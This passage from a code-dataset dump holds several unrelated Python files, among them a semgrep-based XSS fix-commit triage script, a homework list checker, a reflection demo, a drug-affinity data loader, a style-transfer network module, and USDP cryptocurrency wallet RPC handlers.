\".rb\",\n \".ts\",\n \".jsx\",\n \".tsx\",\n \".html\",\n \".erb\",\n \".jsp\",\n \".yml\"\n]\n\nwith app.app_context():\n db.create_all()\n\ndef parse_args():\n args = argparse.ArgumentParser(\n description=\"\"\"\n Automates the process of triaging XSS research results by generating\n diffs of semgrep runs on parent and child commits, along with the\n git diffs if needed.\n \"\"\",\n formatter_class=argparse.RawTextHelpFormatter\n )\n\n args.add_argument(\n \"-i\",\n \"--input\",\n action=\"store\",\n required=True,\n help=\"The JSON file containing information on bigQuery results.\"\n )\n\n args.add_argument(\n \"--diffs-only\",\n action=\"store_true\",\n required=False,\n help=\"Only run semgrep on the diffs between the two commits.\"\n )\n\n return args.parse_args()\n\ndef download_ruleset(ruleset_url: str, download_path: str = LOCAL_RULESET_FILE) -> str:\n logger.info(f\"Downloading ruleset '{ruleset_url}' to file '{download_path}'\")\n with open(download_path, 'w') as fout:\n fout.write(requests.get(ruleset_url).text)\n return os.path.abspath(download_path)\n\ndef download_repo(row, path: str):\n repo_name = row[\"repository\"]\n git_url = \"https://github.com/\" + repo_name + \".git\"\n logger.info(f\"Downloading repo '{git_url}'\")\n # download repositories and semgrep diff/ git diff them\n with cwd(DOWNLOADED_REPO_DIRECTORY):\n subprocess.run([\"git\", \"clone\", git_url, repo_name])\n\ndef get_diff_text(path: str, old_commit: str, new_commit: str) -> str:\n logger.info(f\"Running git diff on '{path}'\")\n with cwd(path):\n p = subprocess.run([\"git\", \"--no-pager\", \"diff\", old_commit, new_commit], capture_output=True)\n if p.returncode != 0:\n return \"git diff run returned an error.\"\n diff_text = p.stdout\n try:\n return diff_text.decode('utf-8')\n except UnicodeDecodeError:\n return \"Couldn't decode git diff output.\"\n\ndef get_git_diff_files(path: str, old_commit: str, new_commit: str):\n with cwd(path):\n p = subprocess.run([\"git\", \"diff\", \"--name-only\", old_commit, new_commit], stdout=subprocess.PIPE)\n if p.returncode != 0:\n return \"git diff for files only returned an error.\"\n try:\n git_diff_files = p.stdout.decode('utf-8')\n except UnicodeDecodeError:\n return \"Couldn't decode git diff files.\"\n\n git_diff_list = 
list(git_diff_files.split(\"\\n\"))\n if len(git_diff_list) > 0:\n git_diff_list = git_diff_list[:-1]\n return git_diff_list\n\ndef lang_supported(git_diff_files: list) -> bool:\n # if more than 20% of files is of an extension we don't support, skip.\n unsupported_files = 0\n max_unsupported_files = math.floor(len(git_diff_files)/5)\n for file in git_diff_files:\n filename, file_extension = os.path.splitext(file)\n if not file_extension in SUPPORTED_LANG_EXTS_XSS:\n unsupported_files += 1\n if unsupported_files > max_unsupported_files:\n logger.info(f\"This repository has {unsupported_files} file(s) in languages that are not supported.\")\n return False\n return True\n\ndef get_semgrep_results(path: str, old_commit: str, new_commit: str) -> str:\n git_diff_list = get_git_diff_files(path, old_commit, new_commit)\n # if git diff list doesn't return error, run lang_supported.\n if (type(git_diff_list) != str):\n if (not lang_supported(git_diff_list)):\n return \"Not Supported.\"\n with cwd(path):\n with git_checkout(old_commit):\n p = subprocess.run([\"semgrep\", \"-f\", LOCAL_RULESET_FILE], stdout=subprocess.PIPE)\n try:\n results = p.stdout.decode('utf-8')\n except UnicodeDecodeError:\n return \"Could not decode git diff output.\"\n return results\n\ndef get_semgrep_results_for_changed_files(path: str, old_commit: str, new_commit: str)-> str:\n # get files that had diffs.\n logger.info(f\"Running Semgrep on '{path}'\")\n git_diff_list = get_git_diff_files(path, old_commit, new_commit)\n if (not lang_supported(git_diff_list)):\n return \"Not Supported.\"\n\n with cwd(path):\n with git_checkout(old_commit):\n cmd = ['semgrep', '--config', LOCAL_RULESET_FILE]\n for file_name in git_diff_list:\n file_name = file_name.strip()\n # check if the file exists in the old directory\n if os.path.exists(file_name):\n cmd.append(file_name)\n if (len(cmd) == LEN_CMD):\n return \"Only added files diff'ed.\"\n p = subprocess.run(cmd, stdout=subprocess.PIPE)\n if p.returncode != 0:\n return \"semgrep run returned an error.\"\n try:\n return p.stdout.decode('utf-8')\n except UnicodeDecodeError:\n return \"Couldn't decode semgrep output.\"\n\ndef post_to_db(row, git_diff_text: str, semgrep_diff_text: str):\n repo_name = row[\"repository\"]\n repo_url = \"https://github.com/\" + repo_name\n row_to_add = Finding(\n repo_url=repo_url,\n repo_message=row[\"message\"],\n fix_commit=row[\"commit\"],\n previous_commit= row[\"parent\"][0],\n diff_text=git_diff_text,\n semgrep_results_on_diff=semgrep_diff_text,\n triage_status=TriageStatus(0),\n reviewer_notes=\"\",\n )\n with app.app_context():\n db.session.add(row_to_add)\n db.session.commit()\n\ndef analyze_repos(table, diffs_only: bool):\n download_ruleset(PACK_URL, LOCAL_RULESET_FILE)\n for index, row in table.iterrows():\n repo_name = row[\"repository\"]\n repo_path = os.path.join(DOWNLOADED_REPO_DIRECTORY, repo_name)\n repo_url = \"https://github.com/\" + repo_name\n # first check if repo already in db. If it is, skip.\n with app.app_context():\n try:\n repo_exists = db.session.query(Finding.id).filter(\n Finding.repo_url==repo_url,\n Finding.fix_commit==row[\"commit\"]).scalar()\n except MultipleResultsFound:\n repo_exists = 1\n if not repo_exists is None:\n logger.info(f\"Skipping '{repo_name} because it is already in the database.\")\n continue\n if not os.path.exists(repo_path):\n logger.info(f\"Repository '{repo_name}' has not been downloaded. 
Downloading...\")\n logger.info(f\"Creating directory '{repo_path}'\")\n os.makedirs(repo_path)\n download_repo(row, repo_path)\n\n git_diff_text = get_diff_text(repo_path, row[\"parent\"][0], row[\"commit\"])\n if diffs_only:\n semgrep_diff_text = get_semgrep_results_for_changed_files(repo_path, row[\"parent\"][0], row[\"commit\"])\n else:\n semgrep_diff_text = get_semgrep_results(repo_path, row[\"parent\"][0], row[\"commit\"])\n if not semgrep_diff_text == \"Not Supported.\":\n post_to_db(row, git_diff_text, semgrep_diff_text)\n\ndef main() -> None:\n args = parse_args()\n # transform json dump into table\n table = pd.read_json(args.input, orient=\"split\")\n analyze_repos(table, args.diffs_only)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"server/xss_research/automate_diffs.py","file_name":"automate_diffs.py","file_ext":"py","file_size_in_byte":8036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"482317721","text":"'''\nDeborah Barndt\n2-20-19\nSortedList.py\nhw5: Question 1 Sorted List\n\nThis program will prompt the user to enter a list and display whether the list\nis sorted or not sorted. \n\nWritten by Deborah Barndt.\n'''\n\n# Function that returns true if the list is already sorted in increasing order.\ndef isSorted(lst):\n for i in range(len(lst) - 1):\n if (lst[i] > lst[i + 1]):\n return False\n return True\n\n# Function that will prompt the user to enter a list and then displays whether\n# the list is sorted or is not sorted.\ndef main():\n enterAgain = 'y'\n\n while (enterAgain == 'y'):\n lst = input('Please enter a list of numbers with spaces: ')\n\n lst = lst.split(' ')\n\n for i in range(len(lst)):\n lst[i] = int(lst[i])\n if isSorted(lst):\n print('The list is already sorted.')\n\n # Ask the user if they would like to enter another list.\n enterAgain = input('\\nWould you like to enter another list? (y/n) ')\n else:\n print('The list is not sorted.')\n\n # Ask the user if they would like to enter another list.\n enterAgain = input('\\nWould you like to enter another list? (y/n) ')\n\n if (enterAgain == 'n'):\n print('\\nThank you. Please come again.')\n\n\n# Call the main function to begin the test program.\nmain()\n","sub_path":"ITMD_513/hw5/SortedList.py","file_name":"SortedList.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"47002412","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Date : 9/5/2017\r\n# @Author : Ying Sun\r\n# @Link : yinsun@microsoft.com\r\n# @Version : 0.1\r\n\r\nclass Dog(object):\r\n\r\n def __init__(self,name):\r\n self.name = name\r\n\r\n def eat(self, food):\r\n print('%s is eating... %s' % (self.name, food))\r\n\r\ndef bulk(name):\r\n print('%s is yelling ....' 
%name)\r\n\r\nd = Dog('Tom')\r\n\r\nwhile True:\r\n choice = input(\">>:\").strip()\r\n\r\n if hasattr(d,choice):\r\n func = getattr(d, choice)\r\n func(\"cherry\")\r\n else:\r\n setattr(d,choice,bulk)\r\n getattr(d,choice)('a user')\r\n\r\n","sub_path":"5_Class/reflect_class.py","file_name":"reflect_class.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"417570373","text":"import json\nimport pickle\nfrom collections import OrderedDict\nimport numpy as np\nfrom rdkit.Chem import AllChem as Chem\nimport argparse\nfrom utils.data_utils import load_shortest_paths\nfrom dataset import *\n\nparser = argparse.ArgumentParser()\nwith open('params.txt', 'r') as f:\n params = f.read()\n\n\nclass Args:\n pass\n\nparam_dict = {}\nitems = params.split()\nfor item in items:\n key, value = item.split('=')\n try:\n value = int(value)\n except ValueError:\n try:\n value = float(value)\n except ValueError:\n pass\n if value == '':\n value = None\n param_dict[key] = value\nargs = Args()\nargs.__dict__.update(param_dict)\n\nargs.data = 'data/kiba'\nload_shortest_paths(args)\ndrug_dataset = MolDataset(read_smiles_from_file('data/kiba/raw.csv'), args)\n\n# for converting protein sequence to categorical format\nseq_voc = \"ABCDEFGHIKLMNOPQRSTUVWXYZ\"\nseq_dict = {v:i for i,v in enumerate(seq_voc)}\nseq_dict_len = len(seq_dict)\nmax_seq_len = 1000 # Note that all protein data will have the same length 1000\n\ndef seq_to_cat(prot):\n x = np.zeros(max_seq_len)\n for i, ch in enumerate(prot[:max_seq_len]):\n x[i] = seq_dict[ch]\n return x\n\nfpath = 'data/kiba/'\n\n# Read in drugs and proteins\ndrugs_ = json.load(open(fpath + \"ligands_can.txt\"), object_pairs_hook=OrderedDict)\ndrugs = np.array([Chem.MolToSmiles(Chem.MolFromSmiles(d),isomericSmiles=True) for d in drugs_.values()])\nproteins_ = json.load(open(fpath + \"proteins.txt\"), object_pairs_hook=OrderedDict)\nproteins = np.array(list(proteins_.values()))\n\n# Read in affinity data\naffinity = np.array(pickle.load(open(fpath + \"Y\",\"rb\"), encoding='latin1'))\n\n# Read in train/test fold\ntrain_fold = json.load(open(fpath + \"folds/train_fold_setting1.txt\"))\ntrain_fold = [ee for e in train_fold for ee in e ]\n'''\nHere all validation folds are aggregated into training set. 
\nIf you want to train models with different architectures and/or \noptimize for model hyperparameters, we encourage you to use 5-fold \ncross validation as provided here.\n'''\ntest_fold = json.load(open(fpath + \"folds/test_fold_setting1.txt\"))\n\n# Prepare train/test data with fold indices\nrows, cols = np.where(np.isnan(affinity)==False)\ndrugs_tr = drugs[rows[train_fold]]\ndrugs_tr_ind = rows[train_fold]\nproteins_tr = np.array([seq_to_cat(p) for p in proteins[cols[train_fold]]])\naffinity_tr = affinity[rows[train_fold], cols[train_fold]]\n\ndrugs_ts = drugs[rows[test_fold]]\ndrugs_ts_ind = rows[test_fold]\nproteins_ts = np.array([seq_to_cat(p) for p in proteins[cols[test_fold]]])\naffinity_ts = affinity[rows[test_fold], cols[test_fold]]\n","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}{"seq_id":"310194139","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\ndef calc_mean_std(feat, eps=1e-5):\n # eps is a small value added to the variance to avoid divide-by-zero.\n size = feat.size()\n assert (len(size) == 4)\n N, C = size[:2]\n feat_var = feat.view(N, C, -1).var(dim=2) + eps\n feat_std = feat_var.sqrt().view(N, C, 1, 1)\n feat_mean = feat.view(N, C, -1).mean(dim=2).view(N, C, 1, 1)\n return feat_mean, feat_std\n\ndef calc_emd_loss(pred, target):\n b, _, h, w = pred.shape\n pred = pred.reshape([b, -1, w * h])\n pred_norm = torch.sqrt((pred**2).sum(1).reshape([b, -1, 1]))\n pred = pred.transpose(2, 1)\n target_t = target.reshape([b, -1, w * h])\n target_norm = torch.sqrt((target**2).sum(1).reshape([b, 1, -1]))\n similarity = torch.bmm(pred, target_t) / pred_norm / target_norm\n dist = 1. - similarity\n return dist\n\ndef adaptive_instance_normalization(content_feat, style_feat):\n assert (content_feat.size()[:2] == style_feat.size()[:2])\n size = content_feat.size()\n style_mean, style_std = calc_mean_std(style_feat)\n content_mean, content_std = calc_mean_std(content_feat)\n\n normalized_feat = (content_feat - content_mean.expand(\n size)) / content_std.expand(size)\n return normalized_feat * style_std.expand(size) + style_mean.expand(size)\n\n\ndef mean_normalization(feat):\n size = feat.size()\n mean, std = calc_mean_std(feat)\n normalized_feat = (feat - mean.expand(size))/std.expand(size)\n return normalized_feat\n \n\nclass Attention(nn.Module):\n def __init__(self, num_features):\n super(Attention, self).__init__()\n self.query_conv = nn.Conv2d(num_features, num_features, (1, 1))\n self.key_conv = nn.Conv2d(num_features, num_features, (1, 1))\n self.value_conv = nn.Conv2d(num_features, num_features, (1, 1))\n self.softmax = nn.Softmax(dim = -1)\n nn.init.xavier_uniform_(self.query_conv.weight)\n nn.init.uniform_(self.query_conv.bias, 0.0, 1.0)\n nn.init.xavier_uniform_(self.key_conv.weight)\n nn.init.uniform_(self.key_conv.bias, 0.0, 1.0)\n nn.init.xavier_uniform_(self.value_conv.weight)\n nn.init.uniform_(self.value_conv.bias, 0.0, 1.0)\n \n def forward(self, content_feat, style_feat):\n Query = self.query_conv(mean_normalization(content_feat))\n Key = self.key_conv(mean_normalization(style_feat))\n Value = self.value_conv(style_feat)\n batch_size, channels, height_c, width_c = Query.size()\n Query = Query.view(batch_size, -1, width_c * height_c).permute(0, 2, 1)\n batch_size, channels, height_s, width_s = Key.size()\n Key = Key.view(batch_size, -1, width_s * height_s)\n Attention_Weights = self.softmax(torch.bmm(Query, Key))\n\n Value = 
Value.view(batch_size, -1, width_s * height_s)\n Output = torch.bmm(Value, Attention_Weights.permute(0, 2, 1))\n Output = Output.view(batch_size, channels, height_c, width_c)\n return Output\n\n\nclass SAFIN(nn.Module):\n def __init__(self, num_features):\n super().__init__()\n self.num_features = num_features\n self.shared_weight = nn.Parameter(torch.Tensor(num_features), requires_grad=True)\n self.shared_bias = nn.Parameter(torch.Tensor(num_features), requires_grad=True)\n self.shared_pad = nn.ReflectionPad2d((1, 1, 1, 1))\n self.gamma_conv = nn.Conv2d(num_features, num_features, (1, 1))\n self.beta_conv = nn.Conv2d(num_features, num_features, (1, 1))\n self.attention = Attention(num_features)\n self.relu = nn.ReLU()\n nn.init.ones_(self.shared_weight)\n nn.init.zeros_(self.shared_bias)\n nn.init.xavier_uniform_(self.gamma_conv.weight)\n nn.init.uniform_(self.gamma_conv.bias, 0.0, 1.0)\n nn.init.xavier_uniform_(self.beta_conv.weight)\n nn.init.uniform_(self.beta_conv.bias, 0.0, 1.0)\n\n def forward(self, content_feat, style_feat, output_shared=False):\n assert (content_feat.size()[:2] == style_feat.size()[:2])\n size = content_feat.size()\n style_feat = self.attention(content_feat, style_feat)\n style_gamma = self.relu(self.gamma_conv(style_feat))\n style_beta = self.relu(self.beta_conv(style_feat))\n content_mean, content_std = calc_mean_std(content_feat)\n\n normalized_feat = (content_feat - content_mean.expand(\n size)) / content_std.expand(size)\n shared_affine_feat = normalized_feat * self.shared_weight.view(1, self.num_features, 1, 1).expand(size) + \\\n self.shared_bias.view(1, self.num_features, 1, 1).expand(size)\n if output_shared:\n return shared_affine_feat\n output = shared_affine_feat * style_gamma + style_beta\n return output\n\n\nclass GANLoss(nn.Module):\n \"\"\"Define different GAN objectives.\n\n The GANLoss class abstracts away the need to create the target label tensor\n that has the same size as the input.\n \"\"\"\n def __init__(self,\n gan_mode,\n target_real_label=1.0,\n target_fake_label=0.0,\n loss_weight=1.0,\n device=None):\n super(GANLoss, self).__init__()\n # when loss weight less than zero return None\n if loss_weight <= 0:\n return None\n\n self.target_real_label = target_real_label\n self.target_fake_label = target_fake_label\n self.loss_weight = loss_weight\n self.device = device\n\n self.gan_mode = gan_mode\n if gan_mode == 'lsgan':\n self.loss = nn.MSELoss()\n elif gan_mode == 'vanilla':\n self.loss = nn.BCEWithLogitsLoss()\n elif gan_mode in ['wgan', 'wgangp', 'hinge', 'logistic']:\n self.loss = None\n else:\n raise NotImplementedError('gan mode %s not implemented' % gan_mode)\n\n def get_target_tensor(self, prediction, target_is_real):\n if target_is_real:\n if not hasattr(self, 'target_real_tensor'):\n self.target_real_tensor = torch.full(\n prediction.shape,\n fill_value=self.target_real_label).float().to(self.device)\n target_tensor = self.target_real_tensor\n else:\n if not hasattr(self, 'target_fake_tensor'):\n self.target_fake_tensor = torch.full(\n prediction.shape,\n fill_value=self.target_fake_label).float().to(self.device)\n target_tensor = self.target_fake_tensor\n\n return target_tensor\n\n def __call__(self,\n prediction,\n target_is_real,\n is_disc=False,\n is_updating_D=None):\n if self.gan_mode in ['lsgan', 'vanilla']:\n target_tensor = self.get_target_tensor(prediction, target_is_real)\n loss = self.loss(prediction, target_tensor)\n elif self.gan_mode.find('wgan') != -1:\n if target_is_real:\n loss = -prediction.mean()\n else:\n 
loss = prediction.mean()\n elif self.gan_mode == 'hinge':\n if target_is_real:\n loss = F.relu(1 - prediction) if is_updating_D else -prediction\n else:\n loss = F.relu(1 + prediction) if is_updating_D else prediction\n loss = loss.mean()\n elif self.gan_mode == 'logistic':\n if target_is_real:\n loss = F.softplus(-prediction).mean()\n else:\n loss = F.softplus(prediction).mean()\n\n return loss if is_disc else loss * self.loss_weight\n\n\nclass Discriminator(nn.Module):\n def __init__(self, depth=5, num_channels=64, device=None):\n super(Discriminator, self).__init__()\n self.head = nn.Sequential(\n nn.Conv2d(3,num_channels,3,stride=1,padding=1),\n nn.BatchNorm2d(num_channels),\n nn.LeakyReLU(0.2)\n )\n self.body = []\n for i in range(depth - 2):\n self.body.append(\n nn.Conv2d(num_channels,\n num_channels,\n kernel_size=3,\n stride=1,\n padding=1))\n self.body.append(nn.BatchNorm2d(num_channels))\n self.body.append(nn.LeakyReLU(0.2))\n self.body = nn.Sequential(*self.body)\n self.tail = nn.Conv2d(num_channels,\n 1,\n kernel_size=3,\n stride=1,\n padding=1)\n self.device = device\n self.ganloss = GANLoss('lsgan', device=self.device)\n\n def losses(self, real, fake):\n pred_real = self(real)\n loss_D_real = self.ganloss(pred_real, True)\n pred_fake = self(fake)\n loss_D_fake = self.ganloss(pred_fake, False)\n loss_D = (loss_D_real + loss_D_fake) * 0.5\n return loss_D\n\n def forward(self, x):\n x = self.head(x)\n x = self.body(x)\n x = self.tail(x)\n return x\n\ndef _calc_feat_flatten_mean_std(feat):\n # takes 3D feat (C, H, W), return mean and std of array within channels\n assert (feat.size()[0] == 3)\n assert (isinstance(feat, torch.FloatTensor))\n feat_flatten = feat.view(3, -1)\n mean = feat_flatten.mean(dim=-1, keepdim=True)\n std = feat_flatten.std(dim=-1, keepdim=True)\n return feat_flatten, mean, std\n\n\ndef _mat_sqrt(x):\n U, D, V = torch.svd(x)\n return torch.mm(torch.mm(U, D.pow(0.5).diag()), V.t())\n\n\ndef coral(source, target):\n # assume both source and target are 3D array (C, H, W)\n # Note: flatten -> f\n\n source_f, source_f_mean, source_f_std = _calc_feat_flatten_mean_std(source)\n source_f_norm = (source_f - source_f_mean.expand_as(\n source_f)) / source_f_std.expand_as(source_f)\n source_f_cov_eye = \\\n torch.mm(source_f_norm, source_f_norm.t()) + torch.eye(3)\n\n target_f, target_f_mean, target_f_std = _calc_feat_flatten_mean_std(target)\n target_f_norm = (target_f - target_f_mean.expand_as(\n target_f)) / target_f_std.expand_as(target_f)\n target_f_cov_eye = \\\n torch.mm(target_f_norm, target_f_norm.t()) + torch.eye(3)\n\n source_f_norm_transfer = torch.mm(\n _mat_sqrt(target_f_cov_eye),\n torch.mm(torch.inverse(_mat_sqrt(source_f_cov_eye)),\n source_f_norm)\n )\n\n source_f_transfer = source_f_norm_transfer * \\\n target_f_std.expand_as(source_f_norm) + \\\n target_f_mean.expand_as(source_f_norm)\n\n return source_f_transfer.view(source.size())\n","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":10585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"528531184","text":"# -*- coding: utf-8 -*-\n\"\"\"\nauthor: yqq\ndate: 2019-05-11 20:26\ndescriptions: USDP处理\n\"\"\"\nimport json\n\nfrom base_handler import BaseHandler\nfrom utils import decimal_default,str_to_decimal,get_linenumber\nfrom .proxy import USDPProxy\nfrom constants import USDP_IP_ADDR, USDP_RPC_PORT\n\ng_IP, g_PORT = USDP_IP_ADDR, USDP_RPC_PORT\n\n \nclass USDP_GetBalance(BaseHandler):\n @staticmethod\n def 
get_balance(rpcconn, addr):\n balance = rpcconn.getBalance(addr)\n return balance\n\n def post(self):\n rpcconn = USDPProxy(g_IP, g_PORT)\n try:\n address = self.get_argument(\"address\")\n if len(address) != 43:\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"arguments error\")))\n return\n balance = USDP_GetBalance.get_balance(rpcconn, address)\n self.write(json.dumps(BaseHandler.success_ret_with_data(str(balance)), default=decimal_default))\n except Exception as e:\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"error: %s\"%e)))\n print(\"USDP_GetBalance error:{0} in {1}\".format(e,get_linenumber()))\n\n \nclass USDP_SendRawTransaction(BaseHandler):\n def post(self):\n rpcconn = USDPProxy(g_IP, g_PORT)\n try:\n data = str(self.get_argument(\"tx\"))\n if len(data) < 40:\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"arguments error\")))\n return\n rsp = rpcconn.sendRawTransaction(data)\n\n retData = {}\n retData[\"txid\"] = rsp[\"txhash\"]\n retData[\"blockNumber\"] = rsp[\"height\"]\n retData[\"gasUsed\"] = str(float(rsp[\"gas_used\"])/(10**8))\n\n self.write(json.dumps(BaseHandler.success_ret_with_data(retData), default=decimal_default))\n except Exception as e:\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"error: %s\"%e)))\n print(\"USDP_SendRawTransaction error:{0} in {1}\".format(e,get_linenumber()))\n\nclass USDP_ListAccounts(BaseHandler):\n @staticmethod\n def addresses():\n from sql import run\n accounts = run('select address from t_usdp_accounts')\n return [account['address'].strip() for account in accounts]\n\n def get(self):\n rpcconn = USDPProxy(g_IP, g_PORT)\n try:\n data = USDP_ListAccounts.addresses()\n self.write(json.dumps(BaseHandler.success_ret_with_data(data), default=decimal_default))\n except Exception as e:\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"error: %s\"%e)))\n print(\"USDP_ListAccounts error:{0} in {1}\".format(e,get_linenumber()))\n\n \nclass USDP_GetLatestBlockNumber(BaseHandler):\n @staticmethod\n def latest(rpcconn):\n lastestBlockNum = int(rpcconn.getLastestBlockNumber())\n return lastestBlockNum\n\n def get(self):\n rpcconn = USDPProxy(g_IP, g_PORT)\n try:\n data = USDP_GetLatestBlockNumber.latest(rpcconn)\n self.write(json.dumps(BaseHandler.success_ret_with_data(data), default=decimal_default))\n except Exception as e:\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"error: %s\"%e)))\n print(\"USDP_GetLatestBlockNumber error:{0} in {1}\".format(e,get_linenumber()))\n\nclass USDP_GetTransactionFromBlock(BaseHandler):\n @staticmethod\n def getTransactionFromBlock(rpcconn, nBlockNum):\n data = rpcconn.getBlockByBlockNum(nBlockNum)\n import time\n timeStr = data[\"block_meta\"][\"header\"][\"time\"]\n timeStr = timeStr[ : timeStr.rfind('.') ]\n ta = time.strptime(timeStr, \"%Y-%m-%dT%H:%M:%S\")\n timestamp = int(time.mktime(ta))\n print(\"timestamp\", timestamp)\n\n\n retData = []\n txs = data[\"block\"][\"txs\"]\n if not isinstance(txs, list): return []\n for tx in txs:\n txData = {}\n txData[\"txid\"] = tx[\"Hash\"]\n txData[\"from\"] = tx[\"From\"]\n txData[\"to\"] = tx[\"To\"]\n txData[\"amount\"] = \"%.8f\" % (float(tx[\"Amount\"][0][\"amount\"]) / (10**8))\n txData[\"timestamp\"] = timestamp\n\n\n retData.append(txData)\n return retData\n\n\n\n def post(self):\n rpcconn = USDPProxy(g_IP, g_PORT)\n try:\n nBlockNum = self.get_argument(\"blkNumber\")\n data = USDP_GetTransactionFromBlock.getTransactionFromBlock(rpcconn, nBlockNum)\n self.write(json.dumps(BaseHandler.success_ret_with_data(data), 
default=decimal_default))\n except Exception as e:\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"error: %s\"%e)))\n print(\"USDP_GetTransactionFromBlock : error:{0} in {1}\".format(e,get_linenumber()))\n\n\nclass USDP_GetAccountInfo(BaseHandler):\n @staticmethod\n def account_info(rpcconn, addr):\n data = rpcconn.getAccountInfo(addr)\n retData = {}\n retData[\"address\"] = data[\"value\"][\"address\"]\n retData[\"account_number\"] = data[\"value\"][\"account_number\"]\n retData[\"sequence\"] = data[\"value\"][\"sequence\"]\n retData[\"balance\"] = data[\"value\"][\"coins\"][0][\"amount\"] \n return retData\n\n def post(self):\n rpcconn = USDPProxy(g_IP, g_PORT)\n try:\n addr = self.get_argument(\"address\")\n if len(addr) != 43:\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"arguments error\")))\n return\n if addr[ : 5] != \"usdp1\":\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"arguments error\")))\n return\n data = USDP_GetAccountInfo.account_info(rpcconn, addr)\n self.write(json.dumps(BaseHandler.success_ret_with_data(data), default=decimal_default))\n except Exception as e:\n if str(e) == \"500\":\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"error: not found any info of the account. Due to the account DOT NOT have transactions yet. \")))\n else:\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"error: %s\"%e)))\n print(\"USDP_GetAccountInfo error:{0} in {1}\".format(e,get_linenumber()))\n\n\n\n\n#2019-05-11 yqq\n#获取用户充币信息的接口, 直接从数据库中获取交易数据\nclass USDP_CrawlTxData(BaseHandler):\n\n def GetTxDataFromDB(self, nBegin, nEnd):\n\n #增加参数检查\n #print(\"nBegin , nEnd type is not int.\")\n #if not (isinstance(nBegin, int) and isinstance(nEnd, int)):\n if not (isinstance(nBegin, int) and (isinstance(nEnd, int) or isinstance(nEnd, long) )):\n print(\"nBegin is not int\")\n return []\n\n \n txRet = []\n\n import sql\n strSql = \"\"\"SELECT txdata FROM t_usdp_charge WHERE height >= {0} and height <= {1} LIMIT 100;\"\"\".format(nBegin, nEnd)\n #strSql = \"\"\"SELECT txdata FROM t_eth_charge WHERE height >= {0} \"\"\".format(nBegin) #\n #print(strSql)\n sqlRet = sql.run(strSql)\n #print(sqlRet)\n if not isinstance(sqlRet, list):\n return []\n for item in sqlRet:\n txListStr = item[\"txdata\"]\n txList = json.loads(txListStr)\n txRet.extend(txList)\n return txRet\n\n #@staticmethod\n def process(self, rpc_connection, nStart):\n txRet = self.GetTxDataFromDB(nStart, (1<<64) - 1) #TODO: 如果充币数据量太大, 需要限制每次返回的数量\n return txRet \n\n\n def post(self):\n rpcconn = USDPProxy(g_IP, g_PORT)\n try:\n nStart = int(self.get_argument(\"blknumber\"))\n data = self.process(rpcconn, nStart)\n self.write(json.dumps(BaseHandler.success_ret_with_data(data), default=decimal_default))\n except Exception as e:\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"error: %s\"%e)))\n print(\"USDP_CrawlTxData error:{0} in {1}\".format(e,get_linenumber()))\n\n","sub_path":"项目/wallet_server/rpc/usdp/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":7935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"96057552","text":"# list comrehension\n# [expr(item) for item in iterable]\nfrom math import factorial\nfrom pprint import pprint as pp\n\n\nf = [len(str(factorial(x))) for x in range(20)]\nprint(f)\nprint(type(f))\n\n\n# {key_expr:value_expr for item in iterable}\ncountry_to_capital = {'China': 'Beijing',\n 'American': 'Washington',\n 'Janpan': 'Tokyo',\n 'Mexico': 'Mexico City',\n 'Sweden': 
'Stockholm'}\n\npp(country_to_capital)\ncapital_to_country = {capital: country for country, capital in country_to_capital.items()}\npp(capital_to_country)\n\n# Duplicates: later keys overwrite earlier keys\nwords = ['hi', 'hello', 'lixue', 'lixueyang', 'hotel']\nword_to_letter = {x[0]: x for x in words}\npp(word_to_letter)\n\n","sub_path":"list comrehension.py","file_name":"list comrehension.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"534685315","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#############################################################################\n# Copyright Vlad Popovici <popovici@bioxlab.org>\n#\n# Licensed under the Apache License, Version 2.0 ( the \"License\" );\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#############################################################################\n\n\"\"\"\nCP_META: extract various information from the meta file (meta.json) produced\nwhen tiling/importing the WSI.\n\"\"\"\n\n__author__ = \"Vlad Popovici <popovici@bioxlab.org>\"\n__version__ = 0.1\n\nimport argparse as opt\nimport simplejson as json\nimport os.path\nfrom math import floor\n\n\ndef main():\n p = opt.ArgumentParser(description=\"Extracts pieces of info from META file.\")\n p.add_argument('meta_path', action='store', help='full path to meta.json (excluding meta.json)')\n p.add_argument('--list_stains', action='store_true', help='list stains in the file')\n p.add_argument('-s', '--stain', action='store', help='stain of interest')\n p.add_argument('-m', '--magnification', action='store', default='',\n help='magnification of interest (e.g. 
